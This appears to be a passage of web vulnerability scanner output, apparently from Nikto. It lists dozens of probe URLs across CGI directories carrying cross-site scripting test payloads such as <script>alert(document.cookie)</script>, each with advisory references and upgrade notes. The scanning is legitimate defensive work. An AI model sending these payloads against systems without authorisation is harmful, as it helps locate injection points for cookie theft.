742+ /index.1.html/ows-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
743+ /index.1.html/cgi-sys/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
744+ /index.1.html/cgi-local/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
745+ /index.1.html/htbin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
746+ /index.1.html/cgibin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
747+ /index.1.html/cgis/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
748+ /index.1.html/scripts/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
749+ /index.1.html/cgi-win/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
750+ /index.1.html/fcgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
751+ /index.1.html/cgi-exe/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
752+ /index.1.html/cgi-home/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
753+ /index.1.html/cgi-perl/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
754+ /index.1.html/scgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
755+ /index.1.html/cgi-bin-sdb/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
756+ /index.1.html/cgi-mod/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
757+ OSVDB-9230: /index.1.html/cgi.cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
758+ OSVDB-9230: /index.1.html/webcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
759+ OSVDB-9230: /index.1.html/cgi-914/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
760+ OSVDB-9230: /index.1.html/cgi-915/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
761+ OSVDB-9230: /index.1.html/bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
762+ OSVDB-9230: /index.1.html/cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
763+ OSVDB-9230: /index.1.html/mpcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
764+ OSVDB-9230: /index.1.html/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
765+ OSVDB-9230: /index.1.html/ows-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
766+ OSVDB-9230: /index.1.html/cgi-sys/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
767+ OSVDB-9230: /index.1.html/cgi-local/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
768+ OSVDB-9230: /index.1.html/htbin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
769+ OSVDB-9230: /index.1.html/cgibin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
770+ OSVDB-9230: /index.1.html/cgis/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
771+ OSVDB-9230: /index.1.html/scripts/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
772+ OSVDB-9230: /index.1.html/cgi-win/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
773+ OSVDB-9230: /index.1.html/fcgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
774+ OSVDB-9230: /index.1.html/cgi-exe/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
775+ OSVDB-9230: /index.1.html/cgi-home/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
776+ OSVDB-9230: /index.1.html/cgi-perl/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
777+ OSVDB-9230: /index.1.html/scgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
778+ OSVDB-9230: /index.1.html/cgi-bin-sdb/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
779+ OSVDB-9230: /index.1.html/cgi-mod/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
780+ OSVDB-2322: /index.1.html/cgi.cgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
781+ OSVDB-2322: /index.1.html/webcgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
782+ OSVDB-2322: /index.1.html/cgi-914/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
783+ OSVDB-2322: /index.1.html/cgi-915/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
784+ OSVDB-2322: /index.1.html/bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
785+ OSVDB-2322: /index.1.html/cgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
786+ OSVDB-2322: /index.1.html/mpcgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
787+ OSVDB-2322: /index.1.html/cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
788+ OSVDB-2322: /index.1.html/ows-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
789+ OSVDB-2322: /index.1.html/cgi-sys/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
790+ OSVDB-2322: /index.1.html/cgi-local/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
791+ OSVDB-2322: /index.1.html/htbin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
792+ OSVDB-2322: /index.1.html/cgibin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
793+ OSVDB-2322: /index.1.html/cgis/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
794+ OSVDB-2322: /index.1.html/scripts/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
795+ OSVDB-2322: /index.1.html/cgi-win/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
796+ OSVDB-2322: /index.1.html/fcgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
797+ OSVDB-2322: /index.1.html/cgi-exe/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
798+ OSVDB-2322: /index.1.html/cgi-home/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
799+ OSVDB-2322: /index.1.html/cgi-perl/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
800+ OSVDB-2322: /index.1.html/scgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
801+ OSVDB-2322: /index.1.html/cgi-bin-sdb/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
802+ OSVDB-2322: /index.1.html/cgi-mod/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
803+ OSVDB-8661: /index.1.html/cgi.cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
804+ OSVDB-8661: /index.1.html/webcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
805+ OSVDB-8661: /index.1.html/cgi-914/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
806+ OSVDB-8661: /index.1.html/cgi-915/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
807+ OSVDB-8661: /index.1.html/bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
808+ OSVDB-8661: /index.1.html/cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
809+ OSVDB-8661: /index.1.html/mpcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
810+ OSVDB-8661: /index.1.html/cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
811+ OSVDB-8661: /index.1.html/ows-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
812+ OSVDB-8661: /index.1.html/cgi-sys/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
813+ OSVDB-8661: /index.1.html/cgi-local/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
814+ OSVDB-8661: /index.1.html/htbin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
815+ OSVDB-8661: /index.1.html/cgibin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
816+ OSVDB-8661: /index.1.html/cgis/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
817+ OSVDB-8661: /index.1.html/scripts/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
818+ OSVDB-8661: /index.1.html/cgi-win/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
819+ OSVDB-8661: /index.1.html/fcgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
820+ OSVDB-8661: /index.1.html/cgi-exe/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
821+ OSVDB-8661: /index.1.html/cgi-home/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
822+ OSVDB-8661: /index.1.html/cgi-perl/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
823+ OSVDB-8661: /index.1.html/scgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
824+ OSVDB-8661: /index.1.html/cgi-bin-sdb/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
825+ OSVDB-8661: /index.1.html/cgi-mod/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
826+ OSVDB-54110: /index.1.html/cgi.cgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
827+ OSVDB-54110: /index.1.html/webcgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
828+ OSVDB-54110: /index.1.html/cgi-914/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
829+ OSVDB-54110: /index.1.html/cgi-915/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
830+ OSVDB-54110: /index.1.html/bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
831+ OSVDB-54110: /index.1.html/cgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
832+ OSVDB-54110: /index.1.html/mpcgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
833+ OSVDB-54110: /index.1.html/cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
834+ OSVDB-54110: /index.1.html/ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
835+ OSVDB-54110: /index.1.html/cgi-sys/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
836+ OSVDB-54110: /index.1.html/cgi-local/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
837+ OSVDB-54110: /index.1.html/htbin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
838+ OSVDB-54110: /index.1.html/cgibin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
839+ OSVDB-54110: /index.1.html/cgis/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
840+ OSVDB-54110: /index.1.html/scripts/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
841+ OSVDB-54110: /index.1.html/cgi-win/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
842+ OSVDB-54110: /index.1.html/fcgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
843+ OSVDB-54110: /index.1.html/cgi-exe/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
844+ OSVDB-54110: /index.1.html/cgi-home/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
845+ OSVDB-54110: /index.1.html/cgi-perl/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
846+ OSVDB-54110: /index.1.html/scgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
847+ OSVDB-54110: /index.1.html/cgi-bin-sdb/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
848+ OSVDB-54110: /index.1.html/cgi-mod/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
849+ OSVDB-2748: /index.1.html/cgi.cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
850+ OSVDB-2748: /index.1.html/webcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
